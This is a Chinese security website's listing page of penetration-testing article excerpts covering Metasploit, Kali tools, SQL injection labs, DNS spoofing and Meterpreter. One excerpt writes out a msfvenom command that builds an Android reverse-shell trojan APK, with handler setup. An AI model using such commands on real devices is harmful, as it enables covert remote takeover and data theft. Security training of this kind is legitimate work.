安基网 首页 安全渗透测试
订阅

渗透测试

  • Metasploit的常用参数介绍

    Metasploit的常用参数介绍
    metasploit 的基本信息:上图中红心下所显示的就是目前版本中所可使用的模块metasploit 的基本为文件结构如下:config metasploit 的环境配置信息,数据库配置信息Data 渗透后模块的一些工具及payload,第三方小工具集合,用户字典等数据信息Db rails 编译生成msf 的web 框架时的数据库信息Doc ...
    2019-10-20 10:13
  • Kali系统中20个超好用黑客渗透工具,你知道几个?

    Kali系统中20个超好用黑客渗透工具,你知道几个?
    我整理列出了一些常用黑客工具,来满足你的每一个需求。记住要保持道德!
    2019-10-15 11:36
  • 黑客是如何锻炼自己的技术?黑客训练基地 - bWAPP

    黑客是如何锻炼自己的技术?黑客训练基地 - bWAPP
    今天给大家介绍的是一款黑客历练的环境靶场:BWAPPbWAPP是一个检测错误的Web应用程序,旨在帮助安全爱好者,开发人员和学生发现和防止Web漏洞。这个安全学习平台可以帮助您为成功的渗透测试和道德黑客项目做好准备。它有超过100个网络漏洞数据,包括所有主要的已知网络漏洞。bWAPP包含有100多 ...
    2019-10-12 11:32
  • ehtools:一款WiFi渗透框架

    ehtools:一款WiFi渗透框架
    该工具仅适用于学习教育目的。使用该工具针对任意目标时都应事先得到授权。项目的开发者对任何使用该工具人的行为不负责任。关于 ehtools 框架如今,Wi-Fi工具变得越来越易于使用,且新手也可以轻松驾驭。Ehtools Framework就是这样一款功能强大且简单易用的无线渗透测试框架。Ehtools可以在短短的几秒 ...
    2019-10-8 11:39
  • Kali Linux实战篇:SQL数据库注入攻防演示「DVWA数据库注入」

    Kali Linux实战篇:SQL数据库注入攻防演示「DVWA数据库注入」
    服务器端程序将用户输入作为参数作为查询条件,直接拼写sql语句,并将结果返回给客户端浏览器 如判断登录select * from users where user='uname' and password='pass'select * from users where user=&#x ...
    2019-10-2 03:19
  • kali linux国内源加速

    kali linux国内源加速
    # leafpad /etc/apt/sources.list#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#阿里云deb http://mirrors.aliyun.com/kali kali-rolling main non-free contribdeb
    2019-9-30 09:32
  • 傻瓜化渗透软件:Armitage

    傻瓜化渗透软件:Armitage
    傻瓜式的渗透软件:Armitage各位小伙伴们大部分都知道metasploit,为了其他小伙伴我就简单介绍一下Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计, ...
    2019-9-28 10:40
  • 搜索引擎 – 永不过时的渗透神器

    搜索引擎 – 永不过时的渗透神器
    搜索引擎是我日常工作中用得最多的一款工具,国内常用的搜索引擎包括Baidu,sougou,bing,以及信息安全从业人员必备的几款网络搜索引擎。Google搜索引擎这里之所以要介绍google搜索引擎,是因为它有别于百度、搜狗等内容搜索引擎,其在安全界有着非同一般的地位,甚至专门有一名词为google hacking用 ...
    2019-9-23 12:00
  • Kali Linux实战篇:Ettercap 使用教程+DNS欺骗攻击实战

    Kali Linux实战篇:Ettercap 使用教程+DNS欺骗攻击实战
    EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具。它具有动态连接嗅探、动态内容过滤和许多其他有趣的技巧。它支持对许多协议的主动和被动分析,并包含许多用于网络和主机分析的特性。主要适用于交换局域网络,借 ...
    2019-9-23 11:47
  • 使用kali linux,利用Meterpreter成功渗透Linux主机并新建用户

    使用kali linux,利用Meterpreter成功渗透Linux主机并新建用户
    前言Meterpreter作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。之前的文章《利用Metasploi ...
    2019-9-23 11:47
  • 某OA系统从SYSTEM权限SQL注入到内网漫游

    某OA系统从SYSTEM权限SQL注入到内网漫游
    已提交至漏洞盒子,漏洞编号: vulbox-2019-0207481此漏洞属于高危类型, 因为漏洞未经官方公开,敏感内容做打码处理,如有漏打,请提醒。0x01 发现漏洞七月正值暑假,闲暇时光在百度上inurl一番,找到了一个古老的企业OA系统IP站点,没有域名,扫过一眼,.NET流行时代的普遍漏洞浮现在脑海里——SQL注 ...
    2019-9-22 11:18
  • 一系列精选的渗透测试资源工具和其他的东西

    一系列精选的渗透测试资源工具和其他的东西
    一组很棒的渗透测试资源。渗透测试是对计算机系统及其物理基础设施发起授权的、模拟的攻击,以暴露潜在的安全弱点和漏洞的实践。此项目由Netsparker Web应用程序安全扫描器支持内容匿名工具反病毒逃避工具书防御性编程书籍黑客手册系列丛书锁拿书恶意软件分析的书网络分析的书渗透测试书籍逆向工程的书 ...
    2019-9-20 11:09
  • Kali系列之入侵安卓手机

    Kali系列之入侵安卓手机
    1.查看kali的IP2.输入生成反弹木马命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.21.128 lport=55555 R > /home/1.apk3.启动msfconsole,配置相关参数msfconsole //启动msfconsoleuse exploit/multi/handler //加载模块set payload android/meterpreter/reverse_tcp //选择Paylo ...
    2019-9-20 11:06
  • 你了解过渗透测试扫描器FuXi-Scanner吗

    你了解过渗透测试扫描器FuXi-Scanner吗
    伏羲是一款开源的安全检测工具,适用于中小型企业对企业内部进行安全检测和资产统计。功能一览:基于插件的漏洞扫描功能(类似于巡风)漏洞管理多种协议的弱口令检测企业的子域名收集企业内部资产管理与服务探测端口扫描AWVS接口调用1.拉取镜像docker pull jeffzh3ng/fuxi-scanner2.安装容器docker run ...
    2019-9-20 11:03
  • 网站漏洞测试 sql注入攻击代码的审计与检测

    网站漏洞测试 sql注入攻击代码的审计与检测
    wordpress系统本身代码,很少出现sql注入漏洞,反倒是第三方的插件出现太多太多的漏洞,我们发现,仅仅2019年9月份就出现8个插件漏洞,因为第三方开发的插件,技术都参差不齐,对安全方面也不是太懂导致写代码过程中没有对sql注入,以及xss跨站进行前端安全过滤,才导致发生sql注入漏洞。目前发现的wor ...
    2019-9-17 09:34
  • 最新
    热门
    返回顶部